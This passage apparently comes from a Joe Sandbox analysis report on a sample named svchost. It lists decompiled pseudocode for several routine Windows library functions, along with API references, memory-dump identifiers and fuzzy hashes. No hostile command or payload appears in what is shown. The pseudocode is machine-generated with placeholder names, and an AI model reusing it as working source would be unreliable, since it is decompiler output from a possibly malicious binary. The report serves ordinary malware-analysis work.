    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Global$ByteCharMultiWideWire
    • String ID: @
    • API String ID: 599868136-2766056989
    • Opcode ID: 85ba9ff0d2175e7d85d03607dea1a5789379dcea550fdc3ac0afa182c157cecd
    • Instruction ID: e829a2aba545ff3a89ceca93313109af3b6be272ed64f8f1fbffcc2eb5991ca8
    • Opcode Fuzzy Hash: 85ba9ff0d2175e7d85d03607dea1a5789379dcea550fdc3ac0afa182c157cecd
    • Instruction Fuzzy Hash: BB410672800606EBCB14DFA4C8819BEBBB8FF41314F14C56AE815AB244D3399E46CB88
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 95%
    			E0048CF0C(intOrPtr __ecx, void* __edi) {
				int _t35;
				int _t36;
				void* _t37;
				void* _t43;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t68;
				intOrPtr* _t69;
				void* _t70;
				intOrPtr _t74;
				void* _t76;

				_t70 = __edi;
				E00473304(E00490ED8, _t76);
				_push(__ecx);
				_t74 = __ecx;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x49cd78;
				_t62 =  *((intOrPtr*)(__ecx + 0x80));
				 *(_t76 - 4) = 0;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 4))(1);
				}
				_t63 =  *((intOrPtr*)(_t74 + 0xa8));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x14))(1);
				}
				if( *((intOrPtr*)(E0048C6BF() + 0x14)) == 0) {
					_t68 =  *0x4e1458; // 0x0
					if(_t68 != 0) {
						 *((intOrPtr*)( *_t68 + 4))(1);
						 *0x4e1458 = 0;
					}
					_t69 =  *0x4e1454; // 0x0
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 4))(1);
						 *0x4e1454 = 0;
					}
				}
				_t33 =  *((intOrPtr*)(_t74 + 0x94));
				if( *((intOrPtr*)(_t74 + 0x94)) != 0) {
					E0048A8DD(_t33);
				}
				_t34 =  *((intOrPtr*)(_t74 + 0x98));
				if( *((intOrPtr*)(_t74 + 0x98)) != 0) {
					E0048A8DD(_t34);
				}
				_t35 =  *((intOrPtr*)(_t74 + 0xb0));
				_push(_t70);
				if(_t35 != 0) {
					GlobalDeleteAtom(_t35);
				}
				_t36 =  *((intOrPtr*)(_t74 + 0xb2));
				if(_t36 != 0) {
					GlobalDeleteAtom(_t36);
				}
				_t64 =  *((intOrPtr*)(_t74 + 0xac));
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				_t37 = E0048C6BF();
				if( *((intOrPtr*)(_t37 + 0x10)) ==  *((intOrPtr*)(_t74 + 0x78))) {
					 *((intOrPtr*)(_t37 + 0x10)) = 0;
				}
				if( *((intOrPtr*)(_t37 + 4)) == _t74) {
					 *((intOrPtr*)(_t37 + 4)) = 0;
				}
				E004715AE( *((intOrPtr*)(_t74 + 0x78)));
				E004715AE( *((intOrPtr*)(_t74 + 0x7c)));
				E004715AE( *((intOrPtr*)(_t74 + 0x88)));
				E004715AE( *((intOrPtr*)(_t74 + 0x8c)));
				E004715AE( *((intOrPtr*)(_t74 + 0x90)));
				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t74 + 0x28)) = 0;
				_t43 = E0048DAE0(_t74);
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t43;
			}















    0x0048cf0c
    0x0048cf11
    0x0048cf16
    0x0048cf19
    0x0048cf1b
    0x0048cf1e
    0x0048cf24
    0x0048cf2e
    0x0048cf31
    0x0048cf37
    0x0048cf37
    0x0048cf3a
    0x0048cf42
    0x0048cf48
    0x0048cf48
    0x0048cf53
    0x0048cf55
    0x0048cf5d
    0x0048cf63
    0x0048cf66
    0x0048cf66
    0x0048cf6c
    0x0048cf74
    0x0048cf7a
    0x0048cf7d
    0x0048cf7d
    0x0048cf74
    0x0048cf83
    0x0048cf8b
    0x0048cf8e
    0x0048cf8e
    0x0048cf93
    0x0048cf9b
    0x0048cf9e
    0x0048cf9e
    0x0048cfa3
    0x0048cfaa
    0x0048cfb4
    0x0048cfb7
    0x0048cfb7
    0x0048cfb9
    0x0048cfc3
    0x0048cfc6
    0x0048cfc6
    0x0048cfc8
    0x0048cfd1
    0x0048cfd7
    0x0048cfd7
    0x0048cfda
    0x0048cfe5
    0x0048cfe7
    0x0048cfe7
    0x0048cfed
    0x0048cfef
    0x0048cfef
    0x0048cff5
    0x0048cffd
    0x0048d008
    0x0048d013
    0x0048d01e
    0x0048d023
    0x0048d02c
    0x0048d02f
    0x0048d039
    0x0048d041

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AtomDeleteGlobal$H_prolog
    • String ID: ^I
    • API String ID: 3979803748-3473481074
    • Opcode ID: bf1ba5fd5e8b8e886067ee91b25e1ec73ec849dbe9bb0fd3ba3faa8b7c24b773
    • Instruction ID: 74373865aa010b08e89b9b97141fa36ac7995f425c86afa39fd6c842b2dd3b3f
    • Opcode Fuzzy Hash: bf1ba5fd5e8b8e886067ee91b25e1ec73ec849dbe9bb0fd3ba3faa8b7c24b773
    • Instruction Fuzzy Hash: F53142306006409FDB24BF65C9D5A5EBBA2FF04304F15886FE25B9B6B2C7749D44CB68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041C270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86windowCOMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E0041C270(void* __esi, void* __ebp) {
				intOrPtr _v4;
				char _v16;
				void* __ecx;
				struct HACCEL__* _t14;
				intOrPtr* _t19;
				void* _t20;
				void* _t27;
				struct HICON__* _t28;
				intOrPtr* _t31;
				intOrPtr* _t32;
				struct HACCEL__* _t44;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t49;
				int* _t50;
				void* _t51;
				void* _t54;

				_t51 = __ebp;
				_t45 = __esi;
				_t31 = _t32;
				_t44 = 0;
				_t14 =  *(_t31 + 0x1dc);
				_t55 = _t14;
				if(_t14 != 0) {
					DestroyAcceleratorTable(_t14);
					 *(_t31 + 0x1dc) = 0;
				}
				if(E00413AB0(E00418A40(0x3e9, _t44, _t44), _t55,  *((intOrPtr*)(_t31 + 0xdc)),  &_v16, _t44) != 1) {
					L9:
					E00418A40(0x7d0,  *((intOrPtr*)(_t31 + 0xdc)), 0);
					_t19 = E004171E0();
					__eflags = _t19;
					if(_t19 == 0) {
						__eflags =  *0x4c958c - 1;
						if( *0x4c958c == 1) {
							PostQuitMessage(0);
						}
					}
					_t20 = E004854BE(_t19);
					__eflags = _t31;
					if(_t31 == 0) {
						return _t20;
					} else {
						return  *((intOrPtr*)( *_t31 + 4))(1);
					}
				} else {
					_push(_t51);
					_push(_t45);
					while(1) {
						_t44 =  &(_t44->i);
						_t46 = E004135B0(_v4 + 0x14, _t44, 0);
						if(_t46 == 0) {
							break;
						}
						_t8 = _t44 - 1; // 0x1
						_t40 = _v4 + 0x14;
						if(E00413C90(_v4 + 0x14, _t8) == 0) {
							_t48 = _t46 + 0x18;
							_t49 = _t48 + E0040C020(_t40, _t48);
							_t27 = E0040C020(_t40, _t49);
							_t11 = _t49 + 0x14; // 0x14
							_t50 = _t27 + _t11;
							_t54 = _t54 + 8;
							_t28 =  *_t50;
							if(_t28 != 0) {
								DestroyCursor(_t28);
								 *_t50 = 0;
							}
						}
					}
					goto L9;
				}
			}





















    0x0041c270
    0x0041c270
    0x0041c272
    0x0041c275
    0x0041c277
    0x0041c27d
    0x0041c27f
    0x0041c282
    0x0041c288
    0x0041c288
    0x0041c2b1
    0x0041c312
    0x0041c320
    0x0041c32a
    0x0041c32f
    0x0041c331
    0x0041c333
    0x0041c33a
    0x0041c33e
    0x0041c33e
    0x0041c33a
    0x0041c346
    0x0041c34b
    0x0041c34d
    0x0041c35b
    0x0041c34f
    0x00000000
    0x0041c355
    0x0041c2b3
    0x0041c2b3
    0x0041c2ba
    0x0041c2bb
    0x0041c2c4
    0x0041c2cd
    0x0041c2d1
    0x00000000
    0x00000000
    0x0041c2d7
    0x0041c2db
    0x0041c2e5
    0x0041c2e7
    0x0041c2f0
    0x0041c2f3
    0x0041c2f8
    0x0041c2f8
    0x0041c2fc
    0x0041c2ff
    0x0041c303
    0x0041c306
    0x0041c308
    0x0041c308
    0x0041c303
    0x0041c2e5
    0x00000000
    0x0041c311

    APIs
    • DestroyAcceleratorTable.USER32(?), ref: 0041C282
    • DestroyCursor.USER32(00000000), ref: 0041C306
    • PostQuitMessage.USER32(00000000), ref: 0041C33E
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Destroy$AcceleratorCursorMessagePostQuitTable
    • String ID: ^I
    • API String ID: 40448814-3473481074
    • Opcode ID: d312750a9a1ed2b6a32b767875e598d58ee2d6d671133c062bafe09f893f6704
    • Instruction ID: f665e91321884240b908e254e3bbee1e076b294f88ecf1481de6675e129dbe22
    • Opcode Fuzzy Hash: d312750a9a1ed2b6a32b767875e598d58ee2d6d671133c062bafe09f893f6704
    • Instruction Fuzzy Hash: A2218371640201ABD7249FA6CC85F9B77A8AF90705F04457FFD059B282EA78DC84C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0043CBB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 45%
    			E0043CBB0(char _a4) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr _t22;
				intOrPtr _t25;
				void* _t26;
				void* _t30;
				intOrPtr _t39;
				void* _t47;
				void* _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t54;

				_push(0xffffffff);
				_push(E00490288);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t54;
				if(_a4 != 0) {
					_v28 = _a4;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v4 = 0;
					 *0x49224c(0x4c9e70, _t47, _t50);
					_t51 = 0;
					while(1) {
						_t22 =  *0x4c9e8c; // 0x0
						if(_t22 == 0) {
							break;
						}
						_t39 =  *0x4c9e90; // 0x0
						if(_t51 < _t39 - _t22 >> 2) {
							_push( *((intOrPtr*)(_t22 + _t51 * 4)) + 0x20);
							_push(1);
							_push(_v24);
							E004298E0( &_v32);
							_t51 = _t51 + 1;
							continue;
						}
						break;
					}
					 *0x492250(0x4c9e70);
					E0043CCA0();
					_t52 = 0;
					while(1) {
						_t25 = _v32;
						if(_t25 == 0 || _t52 >= _v28 - _t25 >> 2) {
							break;
						}
						WaitForSingleObject( *(_t25 + _t52 * 4), 0xffffffff);
						_t52 = _t52 + 1;
					}
					_t26 = E0048302C(_t25);
					 *[fs:0x0] = _v20;
					return _t26;
				} else {
					_t30 = E0043CCA0();
					 *[fs:0x0] = _v12;
					return _t30;
				}
			}




















    0x0043cbb6
    0x0043cbb8
    0x0043cbbd
    0x0043cbc2
    0x0043cbd1
    0x0043cbee
    0x0043cbf2
    0x0043cbf6
    0x0043cbfa
    0x0043cc03
    0x0043cc07
    0x0043cc0d
    0x0043cc0f
    0x0043cc0f
    0x0043cc16
    0x00000000
    0x00000000
    0x0043cc18
    0x0043cc25
    0x0043cc35
    0x0043cc36
    0x0043cc38
    0x0043cc39
    0x0043cc3e
    0x00000000
    0x0043cc3e
    0x00000000
    0x0043cc25
    0x0043cc46
    0x0043cc4c
    0x0043cc57
    0x0043cc59
    0x0043cc59
    0x0043cc5f
    0x00000000
    0x00000000
    0x0043cc74
    0x0043cc76
    0x0043cc76
    0x0043cc7a
    0x0043cc86
    0x0043cc93
    0x0043cbd3
    0x0043cbd3
    0x0043cbdd
    0x0043cbe7
    0x0043cbe7

    APIs
    • RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043CC07
    • RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043CC46
    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?), ref: 0043CC74
      • Part of subcall function 0043CCA0: RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043CCA7
      • Part of subcall function 0043CCA0: SetEvent.KERNEL32(?,?,?,?,?), ref: 0043CCD4
      • Part of subcall function 0043CCA0: RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043CCDE
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave$EventObjectSingleWait
    • String ID: ^I
    • API String ID: 497781136-3473481074
    • Opcode ID: a3bc7313fbcfae264f8b6553b694d66f29f491bd3d1f4ff8d42be61b29ec54f1
    • Instruction ID: 39edfa5902c793a6b17f5c109151ac1ab53aa7a6a4aa854a337ba7f5bec2b722
    • Opcode Fuzzy Hash: a3bc7313fbcfae264f8b6553b694d66f29f491bd3d1f4ff8d42be61b29ec54f1
    • Instruction Fuzzy Hash: B821F1751082419FC710DFA9D9C5A2AF7A0FB98710F506A3EF486A3290C7789804CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00438EF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63windowCOMMON
    Download Yara Rule
    C-Code - Quality: 61%
    			E00438EF0(void* __ebx, void* __ecx, void* __edi, void* __ebp) {
				long _v28;
				char _v32;
				char _v36;
				char _v368;
				intOrPtr _v400;
				char _v516;
				char _v540;
				char _v544;
				char _v552;
				void* _t21;
				intOrPtr* _t23;
				void* _t49;
				intOrPtr _t51;

				_push(0xffffffff);
				_push(E004900F1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t51;
				_push(__ecx);
				_push(0x4b2f44);
				_push(0x806);
				_push("out.prn");
				_push("prn");
				_push(0);
				E00481475( &_v516);
				_v28 = 0;
				_v400 = 0x4b2f20;
				if(E0048160F(__ebx) == 1) {
					_t23 = E004816EA( &_v540,  &_v544);
					_t49 = __ecx + 0x3e0;
					_v32 = 1;
					E0048754F(_t49,  *_t23);
					_v36 = 0;
					E004832C2( &_v552);
					SendMessageA( *(_t49 + 0x1c), 0xb1, 0, 0xffffffff);
					SendMessageA( *(_t49 + 0x1c), 0xb7, 0, 0);
					E0048768A(_t49);
				}
				_v28 = 2;
				E004832C2( &_v368);
				_v28 = 0xffffffff;
				_t21 = E00484054( &_v540);
				 *[fs:0x0] = _v36;
				return _t21;
			}
















    0x00438ef0
    0x00438ef2
    0x00438efd
    0x00438efe
    0x00438f0e
    0x00438f0f
    0x00438f14
    0x00438f19
    0x00438f1e
    0x00438f23
    0x00438f29
    0x00438f32
    0x00438f3d
    0x00438f50
    0x00438f5c
    0x00438f63
    0x00438f6c
    0x00438f74
    0x00438f7d
    0x00438f85
    0x00438f9d
    0x00438fac
    0x00438fb0
    0x00438fb5
    0x00438fbd
    0x00438fc8
    0x00438fd1
    0x00438fdc
    0x00438fe9
    0x00438ff6

    APIs
      • Part of subcall function 00481475: __EH_prolog.LIBCMT ref: 0048147A
      • Part of subcall function 00481475: lstrcpyn.KERNEL32(?,?,00000104), ref: 00481567
      • Part of subcall function 0048160F: lstrlen.KERNEL32(?,?,?,0000000C,?,?,00422B89,?,-00000001,00000000,?,?,?,004B1B90), ref: 00481619
      • Part of subcall function 0048160F: GetFocus.USER32 ref: 00481634
      • Part of subcall function 0048160F: IsWindowEnabled.USER32(?), ref: 0048165D
      • Part of subcall function 0048160F: EnableWindow.USER32(?,00000000), ref: 0048166F
      • Part of subcall function 0048160F: EnableWindow.USER32(?,00000001), ref: 004816B8
      • Part of subcall function 0048160F: IsWindow.USER32(?), ref: 004816BE
      • Part of subcall function 0048160F: SetFocus.USER32(?), ref: 004816CC
      • Part of subcall function 004816EA: __EH_prolog.LIBCMT ref: 004816EF
      • Part of subcall function 004816EA: GetParent.USER32(?), ref: 0048172C
      • Part of subcall function 004816EA: SendMessageA.USER32(?,00000464,00000104,00000000), ref: 00481754
      • Part of subcall function 004816EA: GetParent.USER32(?), ref: 0048177D
      • Part of subcall function 004816EA: SendMessageA.USER32(?,00000465,00000104,00000000), ref: 0048179A
      • Part of subcall function 0048754F: SetWindowTextA.USER32(?,004212EA), ref: 0048755D
      • Part of subcall function 004832C2: InterlockedDecrement.KERNEL32(-000000F4), ref: 004832D6
    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00438F9D
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00438FAC
      • Part of subcall function 0048768A: SetFocus.USER32(?,00417893), ref: 00487694
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$MessageSend$Focus$EnableH_prologParent$DecrementEnabledInterlockedTextlstrcpynlstrlen
    • String ID: out.prn$prn
    • API String ID: 3571112515-3109735852
    • Opcode ID: e16afb9db057877d34d722ba35aac73bbdf6ab15b86ce365e3c3b301b31d78da
    • Instruction ID: e3f9c3cef216e92be05f8f836772eaf366b8aa9b54b0ba7f89b762ba95618730
    • Opcode Fuzzy Hash: e16afb9db057877d34d722ba35aac73bbdf6ab15b86ce365e3c3b301b31d78da
    • Instruction Fuzzy Hash: EC21D131148380ABD330FB14C856FAFB7A8AB94B20F104F1EB4A9662D2DBBC5005CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048CDC2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58threadCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E0048CDC2(intOrPtr __ecx, void* __eflags) {
				void* _t35;
				intOrPtr _t52;
				void* _t54;

				E00473304(E00490ED8, _t54);
				_push(__ecx);
				_t52 = __ecx;
				 *((intOrPtr*)(_t54 - 0x10)) = __ecx;
				E0048D28A(__ecx, __eflags);
				 *((intOrPtr*)(__ecx)) = 0x49cd78;
				 *((intOrPtr*)(_t54 - 4)) = 0;
				if( *((intOrPtr*)(_t54 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x78)) = 0;
				} else {
					 *((intOrPtr*)(_t52 + 0x78)) = E0047386B( *((intOrPtr*)(_t54 + 8)));
				}
				_t35 = E0048C6BF();
				_t7 = _t35 + 0x1070; // 0x1070
				 *((intOrPtr*)(E0048CC47(_t7, E0048C731) + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t35 + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x68)) = 0;
				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
				 *((intOrPtr*)(_t52 + 0x90)) = 0;
				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
				 *((intOrPtr*)(_t52 + 0x88)) = 0;
				 *((intOrPtr*)(_t52 + 0xa8)) = 0;
				 *((intOrPtr*)(_t52 + 0x80)) = 0;
				 *((short*)(_t52 + 0xb2)) = 0;
				 *((short*)(_t52 + 0xb0)) = 0;
				 *((intOrPtr*)(_t52 + 0x70)) = 0;
				 *((intOrPtr*)(_t52 + 0xac)) = 0;
				 *((intOrPtr*)(_t52 + 0xa0)) = 0;
				 *((intOrPtr*)(_t52 + 0xa4)) = 0;
				 *((intOrPtr*)(_t52 + 0x94)) = 0;
				 *((intOrPtr*)(_t52 + 0x98)) = 0;
				 *((intOrPtr*)(_t52 + 0xb4)) = 0;
				 *((intOrPtr*)(_t52 + 0xbc)) = 0;
				 *((intOrPtr*)(_t52 + 0x84)) = 0;
				 *((intOrPtr*)(_t52 + 0xb8)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t52;
			}






    0x0048cdc7
    0x0048cdcc
    0x0048cdcf
    0x0048cdd2
    0x0048cdd5
    0x0048cddc
    0x0048cde5
    0x0048cde8
    0x0048cdf8
    0x0048cdea
    0x0048cdf3
    0x0048cdf3
    0x0048cdfb
    0x0048ce07
    0x0048ce12
    0x0048ce1b
    0x0048ce27
    0x0048ce2a
    0x0048ce2d
    0x0048ce30
    0x0048ce36
    0x0048ce3c
    0x0048ce3f
    0x0048ce45
    0x0048ce4b
    0x0048ce51
    0x0048ce58
    0x0048ce5f
    0x0048ce62
    0x0048ce68
    0x0048ce6e
    0x0048ce74
    0x0048ce7a
    0x0048ce80
    0x0048ce86
    0x0048ce8c
    0x0048ce92
    0x0048cea1
    0x0048cea9

    APIs
    • __EH_prolog.LIBCMT ref: 0048CDC7
      • Part of subcall function 0048D28A: __EH_prolog.LIBCMT ref: 0048D28F
    • GetCurrentThread.KERNEL32 ref: 0048CE15
    • GetCurrentThreadId.KERNEL32 ref: 0048CE1E
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentH_prologThread
    • String ID: ^I
    • API String ID: 2095891121-3473481074
    • Opcode ID: 87e9697a5c5d8b2657309ca7fdaac71301fe91c991db0c1cf0d013cb1ae34a32
    • Instruction ID: 048fbadb8bf1421d6df2a7a591d955ce1f9ef7ca1d87a7db93d7e9a08d9132e3
    • Opcode Fuzzy Hash: 87e9697a5c5d8b2657309ca7fdaac71301fe91c991db0c1cf0d013cb1ae34a32
    • Instruction Fuzzy Hash: 8E21B0B0900B00DFD720AF2AC58179AFBE8FFA4300F10892FE5AA96621DBB46541CF55
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047EFF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
    Download Yara Rule
    C-Code - Quality: 16%
    			E0047EFF0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t20;

				InterlockedIncrement(0x4e1c68);
				_t20 =  *0x4e1c64; // 0x0
				if(_t20 != 0) {
					InterlockedDecrement(0x4e1c68);
					E004774D4(0x13);
					_push(1);
					_pop(0);
				}
				_a12 = E0047F04D(_a4, _a8, _a12);
				if(0 == 0) {
					InterlockedDecrement(0x4e1c68);
				} else {
					E00477535(0x13);
				}
				return _a12;
			}




    0x0047effc
    0x0047f00a
    0x0047f010
    0x0047f013
    0x0047f017
    0x0047f01d
    0x0047f01f
    0x0047f01f
    0x0047f031
    0x0047f036
    0x0047f043
    0x0047f038
    0x0047f03a
    0x0047f03f
    0x0047f04c

    APIs
    • InterlockedIncrement.KERNEL32(004E1C68), ref: 0047EFFC
    • InterlockedDecrement.KERNEL32(004E1C68), ref: 0047F013
      • Part of subcall function 004774D4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 00477511
      • Part of subcall function 004774D4: RtlEnterCriticalSection.NTDLL(?), ref: 0047752C
